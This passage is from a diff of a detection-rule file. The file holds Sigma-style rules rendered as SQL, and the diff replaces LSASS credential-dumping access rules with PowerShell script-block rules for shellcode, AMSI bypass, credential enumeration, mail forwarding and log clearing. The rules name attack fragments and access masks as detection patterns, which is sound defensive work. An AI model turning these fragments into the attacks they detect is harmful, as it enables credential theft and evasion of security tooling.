- ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%0x1038%' ESCAPE '\\' OR GrantedAccess LIKE '%0x1438%' ESCAPE '\\' OR GrantedAccess LIKE '%0x143a%' ESCAPE '\\') AND (CallTrace LIKE '%dbghelp.dll%' ESCAPE '\\' OR CallTrace LIKE '%dbgcore.dll%' ESCAPE '\\' OR CallTrace LIKE '%ntdll.dll%' ESCAPE '\\')) AND NOT ((CallTrace LIKE '%|C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND CallTrace LIKE '%\\\\thor\\\\thor64.exe+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND GrantedAccess = '0x103800') OR (SourceImage LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%new-object %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ComObject %' ESCAPE '\\' AND ScriptBlockText LIKE '%.application%' ESCAPE '\\' AND ScriptBlockText LIKE '%.RegisterXLL%' ESCAPE '\\')" ], - "filename": "proc_access_win_lsass_memdump.yml" + "filename": "posh_ps_office_comobject_registerxll.yml" }, { - "title": "Load Undocumented Autoelevated COM Interface", - "id": "fb3722e4-1a06-46b6-b772-253e2e7db933", + "title": "PowerShell ShellCode", + "id": "16b37b70-6fcf-4814-a092-c36bd3aafcbd", "status": "test", - "description": "COM interface (EditionUpgradeManager) that is not used by standard executables.", - "author": "oscd.community, Dmitry Uchakin", + "description": "Detects Base64 encoded Shellcode", + "author": "David Ledbetter (shellcode), Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1055", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE CallTrace LIKE '%editionupgrademanagerobj.dll%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN 
('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%AAAAYInlM%' ESCAPE '\\' AND (ScriptBlockText LIKE '%OiCAAAAYInlM%' ESCAPE '\\' OR ScriptBlockText LIKE '%OiJAAAAYInlM%' ESCAPE '\\'))" ], - "filename": "proc_access_win_load_undocumented_autoelevated_com_interface.yml" + "filename": "posh_ps_shellcode_b64.yml" }, { - "title": "HandleKatz Duplicating LSASS Handle", - "id": "b1bd3a59-c1fd-4860-9f40-4dd161a7d1f5", - "status": "experimental", - "description": "Detects HandleKatz opening LSASS to duplicate its handle to later dump the memory without opening any new handles", - "author": "Bhabesh Raj (rule), @thefLinkk", + "title": "Enumerate Credentials from Windows Credential Manager With PowerShell", + "id": "603c6630-5225-49c1-8047-26c964553e0e", + "status": "test", + "description": "Adversaries may search for common password storage locations to obtain user credentials.\nPasswords are stored in several places on a system, depending on the operating system or application holding the credentials.\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1106", - "attack.defense_evasion", - "attack.t1003.001" + "attack.credential_access", + "attack.t1555" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess = '0x1440' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%)' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%vaultcmd%' ESCAPE '\\' AND ScriptBlockText LIKE '%/listcreds:%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Windows Credentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Web Credentials%' ESCAPE '\\'))" ], - "filename": 
"proc_access_win_handlekatz_lsass_access.yml" + "filename": "posh_ps_enumerate_password_windows_credential_manager.yml" }, { - "title": "Rare GrantedAccess Flags on LSASS Access", - "id": "678dfc63-fefb-47a5-a04c-26bcf8cc9f65", + "title": "Suspicious PowerShell Mailbox SMTP Forward Rule", + "id": "15b7abbb-8b40-4d01-9ee2-b51994b1d474", "status": "experimental", - "description": "Detects process access to LSASS memory with suspicious access flags 0x410 and 0x01410 (spin-off of similar rule)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of the powerShell Set-Mailbox Cmdlet to set-up an SMTP forwarding rule.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.exfiltration" ], "falsepositives": [ - "Legitimate software accessing LSASS process for legitimate reason" + "Legitimate usage of the cmdlet to forward emails" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess LIKE '%10' ESCAPE '\\') AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Malwarebytes\\\\Anti-Malware\\\\MBAMService.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\System32\\\\perfmon.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR SourceImage LIKE 
'C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Common Files\\\\McAfee\\\\MMSSHost\\\\MMSSHOST.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\GamingServices.exe' ESCAPE '\\') OR ((SourceImage LIKE '%\\\\PROCEXP64.EXE' ESCAPE '\\' OR SourceImage LIKE '%\\\\PROCEXP.EXE' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND SourceImage LIKE '%Antivirus%' ESCAPE '\\') OR ((SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\')) OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vs\\_bootstrapper\\_%' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\%' ESCAPE '\\')) OR (SourceCommandLine LIKE 'C:\\\\WINDOWS\\\\system32\\\\wermgr.exe -upload' ESCAPE '\\') OR (SourceImage LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\software\\_reporter\\_tool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\DropboxUpdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR SourceImage LIKE 
'%\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\JetBrains\\\\Toolbox\\\\bin\\\\jetbrains-toolbox.exe' ESCAPE '\\')) OR (SourceImage LIKE '%\\\\xampp-control.exe' ESCAPE '\\' AND GrantedAccess = '0x410') OR (SourceImage LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x10'))))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Set-Mailbox %' ESCAPE '\\' AND ScriptBlockText LIKE '% -DeliverToMailboxAndForward %' ESCAPE '\\' AND ScriptBlockText LIKE '% -ForwardingSmtpAddress %' ESCAPE '\\')" ], - "filename": "proc_access_win_rare_proc_access_lsass.yml" + "filename": "posh_ps_exchange_mailbox_smpt_forwarding_rule.yml" }, { - "title": "Potential Credential Dumping Attempt Via PowerShell", - "id": "0f920ebe-7aea-4c54-b202-9aa0c609cfe5", - "status": "experimental", - "description": "Detects PowerShell processes requesting access to \"lsass.exe\"", - "author": "oscd.community, Natalia Shornikova", + "title": "SyncAppvPublishingServer Execution to Bypass Powershell Restriction", + "id": "dddfebae-c46f-439c-af7a-fdb6bde90218", + "status": "test", + "description": "Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.", + "author": "Ensar Şamil, @sblmsrsn, OSCD Community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "App-V clients" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND 
ScriptBlockText LIKE '%SyncAppvPublishingServer.exe%' ESCAPE '\\')" ], - "filename": "proc_access_win_winapi_in_powershell_credentials_dumping.yml" + "filename": "posh_ps_syncappvpublishingserver_exe.yml" }, { - "title": "Credential Dumping by Pypykatz", - "id": "7186e989-4ed7-4f4e-a656-4674b9e3e48b", + "title": "NTFS Alternate Data Stream", + "id": "8c521530-5169-495d-a199-0a3a881ad24e", "status": "test", - "description": "Detects LSASS process access by pypykatz for credential dumping.", - "author": "Bhabesh Raj", + "description": "Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging.", + "author": "Sami Ruohonen", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1564.004", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+%' ESCAPE '\\' AND CallTrace LIKE '%libffi-7.dll%' ESCAPE '\\' AND CallTrace LIKE '%\\_ctypes.pyd+%' ESCAPE '\\' AND CallTrace LIKE '%python3%.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%set-content%' ESCAPE '\\' OR ScriptBlockText LIKE '%add-content%' ESCAPE '\\') AND ScriptBlockText LIKE '%-stream%' ESCAPE '\\')" ], - "filename": "proc_access_win_pypykatz_cred_dump_lsass_access.yml" + "filename": "posh_ps_ntfs_ads_access.yml" }, { - "title": "SVCHOST Credential Dump", - "id": "174afcfa-6e40-4ae9-af64-496546389294", + "title": "Powershell Create Scheduled Task", + "id": "363eccc0-279a-4ccf-a3ab-24c2e63b11fb", "status": "test", - "description": "Detects when a process, such as mimikatz, 
accesses the memory of svchost to dump credentials", - "author": "Florent Labouyrie", + "description": "Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code", + "author": "frack113", "tags": [ - "attack.t1548" + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ - "Non identified legit exectubale" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x143a') AND NOT ((SourceImage LIKE '%\\\\services.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msiexec.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%New-ScheduledTaskAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ScheduledTaskTrigger%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ScheduledTaskPrincipal%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ScheduledTaskSettingsSet%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ScheduledTask%' ESCAPE '\\' OR ScriptBlockText LIKE '%Register-ScheduledTask%' ESCAPE '\\') OR (ScriptBlockText LIKE '%Invoke-CimMethod%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ClassName%' ESCAPE '\\' AND ScriptBlockText LIKE '%PS\\_ScheduledTask%' ESCAPE '\\' AND ScriptBlockText LIKE '%-NameSpace%' ESCAPE '\\' AND ScriptBlockText LIKE '%Root\\\\Microsoft\\\\Windows\\\\TaskScheduler%' ESCAPE '\\')))" ], - "filename": "proc_access_win_svchost_cred_dump.yml" + "filename": "posh_ps_cmdlet_scheduled_task.yml" }, { - "title": "LSASS Memory Access by Tool Named Dump", - "id": "9bd012ee-0dff-44d7-84a0-aa698cfd87a3", + "title": "Powershell LocalAccount Manipulation", + "id": "4fdc44df-bfe9-4fcc-b041-68f5a2d3031c", "status": "test", - "description": "Detects a possible process memory dump based on a keyword in the file name of the accessing process", - "author": "Florian Roth 
(Nextron Systems)", + "description": "Adversaries may manipulate accounts to maintain access to victim systems.\nAccount manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups\n", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.persistence", + "attack.t1098" ], "falsepositives": [ - "Rare programs that contain the word dump in their name and access lsass" + "Legitimate administrative script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE '%dump%' ESCAPE '\\' AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Disable-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE 
'%Enable-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Rename-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-LocalUser%' ESCAPE '\\'))" ], - "filename": "proc_access_win_lsass_memdump_indicators.yml" + "filename": "posh_ps_localuser.yml" }, { - "title": "LSASS Access from White-Listed Processes", - "id": "4be8b654-0c01-4c9d-a10c-6b28467fc651", - "status": "test", - "description": "Detects a possible process memory dump that uses the white-listed filename like TrolleyExpress.exe as a way to dump the lsass process memory without Microsoft Defender interference", - "author": "Florian Roth (Nextron Systems)", + "title": "Clear PowerShell History - PowerShell", + "id": "26b692dc-1722-49b2-b496-a8258aa6371d", + "status": "experimental", + "description": "Detects keywords that could indicate clearing PowerShell history", + "author": "Ilyas Ochkov, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.defense_evasion", + "attack.t1070.003" ], "falsepositives": [ - "Unlikely, since these tools shouldn't access lsass.exe at all" + "Legitimate PowerShell scripts" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (SourceImage LIKE '%\\\\TrolleyExpress.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ProcessDump.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\dump64.exe' ESCAPE '\\') AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR 
GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (((ScriptBlockText LIKE '%Set-PSReadlineOption%' ESCAPE '\\' AND ScriptBlockText LIKE '%–HistorySaveStyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%SaveNothing%' ESCAPE '\\') OR (ScriptBlockText LIKE '%Set-PSReadlineOption%' ESCAPE '\\' AND ScriptBlockText LIKE '%-HistorySaveStyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%SaveNothing%' ESCAPE '\\')) OR ((ScriptBlockText LIKE '%del%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Item%' ESCAPE '\\' OR ScriptBlockText LIKE '%rm%' ESCAPE '\\') AND ScriptBlockText LIKE '%(Get-PSReadlineOption).HistorySavePath%' ESCAPE '\\')))" ], - "filename": "proc_access_win_lsass_memdump_evasion.yml" + "filename": "posh_ps_clear_powershell_history.yml" }, { - "title": "LittleCorporal Generated Maldoc Injection", - "id": "7bdde3bf-2a42-4c39-aa31-a92b3e17afac", + "title": "AMSI Bypass Pattern Assembly GetType", + "id": "e0d6c087-2d1c-47fd-8799-3904103c5a98", "status": "experimental", - "description": "Detects the process injection of a LittleCorporal generated Maldoc.", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects code fragments found in small and obfuscated AMSI bypass PowerShell scripts", + 
"author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002", - "attack.t1055.003" + "attack.defense_evasion", + "attack.t1562.001", + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' AND CallTrace LIKE '%:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v2.%' ESCAPE '\\' AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Ref].Assembly.GetType%' ESCAPE '\\' AND ScriptBlockText LIKE '%SetValue($null,$true)%' ESCAPE '\\' AND ScriptBlockText LIKE '%NonPublic,Static%' ESCAPE '\\')" ], - "filename": "proc_access_win_littlecorporal_generated_maldoc.yml" + "filename": "posh_ps_amsi_bypass_pattern_nov22.yml" }, { - "title": "WerFault Accassing LSASS", - "id": "e5b33f7d-eb93-48b6-9851-09e1e610b6d7", + "title": "Security Software Discovery by Powershell", + "id": "904e8e61-8edf-4350-b59c-b905fc8e810c", "status": "test", - "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", - "author": "Florian Roth (Nextron Systems)", + "description": "Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment.\nThis may include things such as firewall rules and anti-viru\n", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.discovery", + "attack.t1518.001" ], "falsepositives": [ - "Actual failures in lsass.exe that trigger a crash dump (unlikely)", - "Unknown cases in which WerFault accesses lsass.exe" + "Unknown" ], - "level": "high", + "level": "low", "rule": [ - 
"SELECT * FROM logs WHERE (SourceImage LIKE '%\\\\WerFault.exe' ESCAPE '\\' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%get-process%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Description%' ESCAPE '\\' AND ScriptBlockText LIKE '%-like%' ESCAPE '\\' AND (ScriptBlockText LIKE '%\"%virus%\"%' ESCAPE '\\' OR ScriptBlockText LIKE '%\"%carbonblack%\"%' ESCAPE '\\' OR ScriptBlockText LIKE '%\"%defender%\"%' ESCAPE '\\' OR ScriptBlockText LIKE '%\"%cylance%\"%' ESCAPE '\\'))" ], - "filename": "proc_access_win_lsass_werfault.yml" + "filename": "posh_ps_security_software_discovery.yml" }, { - "title": "Malware Shellcode in Verclsid Target Process", - "id": "b7967e22-3d7e-409b-9ed5-cdae3f9243a1", + "title": "Password Policy Discovery With Get-AdDefaultDomainPasswordPolicy", + "id": "bbb9495b-58fc-4016-b9df-9a3a1b67ca82", "status": "test", - "description": "Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro", - "author": "John Lambert (tech), Florian Roth (Nextron Systems)", + "description": "Detetcts PowerShell activity in which Get-Addefaultdomainpasswordpolicy is used to get the default password policy for an Active Directory domain.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.discovery", + "attack.t1201" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\verclsid.exe' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF') AND ((CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%VBE7.DLL%' ESCAPE '\\') OR (SourceImage LIKE '%\\\\Microsoft Office\\\\%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN%' ESCAPE '\\')))" + "SELECT 
* FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-AdDefaultDomainPasswordPolicy%' ESCAPE '\\')" ], - "filename": "proc_access_win_malware_verclsid_shellcode.yml" + "filename": "posh_ps_susp_get_addefaultdomainpasswordpolicy.yml" }, { - "title": "LSASS Access from Program in Suspicious Folder", - "id": "fa34b441-961a-42fa-a100-ecc28c886725", - "status": "experimental", - "description": "Detects process access to LSASS memory with suspicious access flags and from a suspicious folder", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Suspicious PowerShell Keywords", + "id": "1f49f2ab-26bc-48b3-96cc-dcffbc93eadf", + "status": "test", + "description": "Detects potentially suspicious keywords that could indicate the use of a PowerShell exploitation framework", + "author": "Florian Roth (Nextron Systems), Perez Diego (@darkquassar), Tuan Le (NCSGroup)", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate software accessing LSASS process for legitimate reason" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess 
LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\') AND (SourceImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\Temporary%' ESCAPE '\\')) AND NOT ((SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\software\\_reporter\\_tool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\DropboxUpdate.exe' ESCAPE '\\' 